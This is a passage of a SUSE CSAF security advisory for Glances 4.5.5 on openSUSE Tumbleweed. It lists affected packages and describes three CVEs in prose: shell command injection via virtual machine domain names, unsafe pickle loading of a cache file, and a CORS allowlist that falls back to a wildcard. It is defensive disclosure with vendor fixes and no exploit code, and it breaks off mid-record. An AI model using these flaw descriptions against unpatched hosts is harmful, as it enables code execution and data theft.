Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — | Vendor Fix | |
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64 | — | Vendor Fix | |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "glances-common-4.5.5-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11122",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11122-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46606/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46607 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46607/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46608 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46608/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-46611 page",
"url": "https://www.suse.com/security/cve/CVE-2026-46611/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-53925 page",
"url": "https://www.suse.com/security/cve/CVE-2026-53925/"
}
],
"title": "glances-common-4.5.5-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-25T00:00:00Z",
"generator": {
"date": "2026-06-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11122-1",
"initial_release_date": "2026-06-25T00:00:00Z",
"revision_history": [
{
"date": "2026-06-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.aarch64",
"product": {
"name": "glances-common-4.5.5-1.1.aarch64",
"product_id": "glances-common-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python311-Glances-4.5.5-1.1.aarch64",
"product_id": "python311-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python313-Glances-4.5.5-1.1.aarch64",
"product_id": "python313-Glances-4.5.5-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product": {
"name": "python314-Glances-4.5.5-1.1.aarch64",
"product_id": "python314-Glances-4.5.5-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.ppc64le",
"product": {
"name": "glances-common-4.5.5-1.1.ppc64le",
"product_id": "glances-common-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python311-Glances-4.5.5-1.1.ppc64le",
"product_id": "python311-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python313-Glances-4.5.5-1.1.ppc64le",
"product_id": "python313-Glances-4.5.5-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product": {
"name": "python314-Glances-4.5.5-1.1.ppc64le",
"product_id": "python314-Glances-4.5.5-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.s390x",
"product": {
"name": "glances-common-4.5.5-1.1.s390x",
"product_id": "glances-common-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python311-Glances-4.5.5-1.1.s390x",
"product_id": "python311-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python313-Glances-4.5.5-1.1.s390x",
"product_id": "python313-Glances-4.5.5-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.s390x",
"product": {
"name": "python314-Glances-4.5.5-1.1.s390x",
"product_id": "python314-Glances-4.5.5-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "glances-common-4.5.5-1.1.x86_64",
"product": {
"name": "glances-common-4.5.5-1.1.x86_64",
"product_id": "glances-common-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python311-Glances-4.5.5-1.1.x86_64",
"product_id": "python311-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python313-Glances-4.5.5-1.1.x86_64",
"product_id": "python313-Glances-4.5.5-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product": {
"name": "python314-Glances-4.5.5-1.1.x86_64",
"product_id": "python314-Glances-4.5.5-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64"
},
"product_reference": "glances-common-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le"
},
"product_reference": "glances-common-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x"
},
"product_reference": "glances-common-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "glances-common-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64"
},
"product_reference": "glances-common-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python311-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python311-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python311-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python311-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python313-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python313-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python313-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python313-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64"
},
"product_reference": "python314-Glances-4.5.5-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le"
},
"product_reference": "python314-Glances-4.5.5-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x"
},
"product_reference": "python314-Glances-4.5.5-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-Glances-4.5.5-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
},
"product_reference": "python314-Glances-4.5.5-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-46606",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46606"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances KVM/QEMU monitoring engine (glances/plugins/vms/engines/virsh.py) passes VM domain names, read directly from virsh list --all output, into f-string command templates that are processed by secure_popen(). secure_popen() is explicitly designed to interpret \u0026\u0026, |, and \u003e as shell operators. Because domain names are never sanitised before interpolation, any user with the ability to create or rename a KVM/QEMU virtual machine can execute arbitrary commands as the OS user running Glances - commonly root on hypervisor hosts. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46606",
"url": "https://www.suse.com/security/cve/CVE-2026-46606"
},
{
"category": "external",
"summary": "SUSE Bug 1268800 for CVE-2026-46606",
"url": "https://bugzilla.suse.com/1268800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46606"
},
{
"cve": "CVE-2026-46607",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46607"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, glances/outdated.py uses pickle.load() to read a version-check cache file stored at a predictable, world-accessible path (~/.cache/glances/glances-version.db or $XDG_CACHE_HOME/glances/glances-version.db). No integrity check, signature verification, or format validation is performed before deserialization. An attacker with write access to that path - through any of several realistic local or container-level scenarios - can plant a malicious pickle file and achieve arbitrary code execution as the OS user running Glances the next time it starts with version checking enabled (the default). This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46607",
"url": "https://www.suse.com/security/cve/CVE-2026-46607"
},
{
"category": "external",
"summary": "SUSE Bug 1268854 for CVE-2026-46607",
"url": "https://bugzilla.suse.com/1268854"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-46607"
},
{
"cve": "CVE-2026-46608",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-46608"
}
],
"notes": [
{
"category": "general",
"text": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s) introduced a configurable CORS origin list in version 4.5.3 as a mitigation for CVE-2026-33533. However, the implementation silently falls back to Access-Control-Allow-Origin: * whenever cors_origins contains more than one entry. An operator who configures an explicit two-entry allowlist (e.g. two internal dashboard origins) intending to restrict browser access instead receives the unrestricted wildcard. A malicious web page served from any origin can issue a CORS simple request to /RPC2 and read the full system monitoring dataset without the victim\u0027s knowledge. This vulnerability is fixed in 4.5.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-46608",
"url": "https://www.suse.com/security/cve/CVE-2026-46608"
},
{
"category": "external",
"summary": "SUSE Bug 1268855 for CVE-2026-46608",
"url": "https://bugzilla.suse.com/1268855"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x",
"openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64",
"openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64",
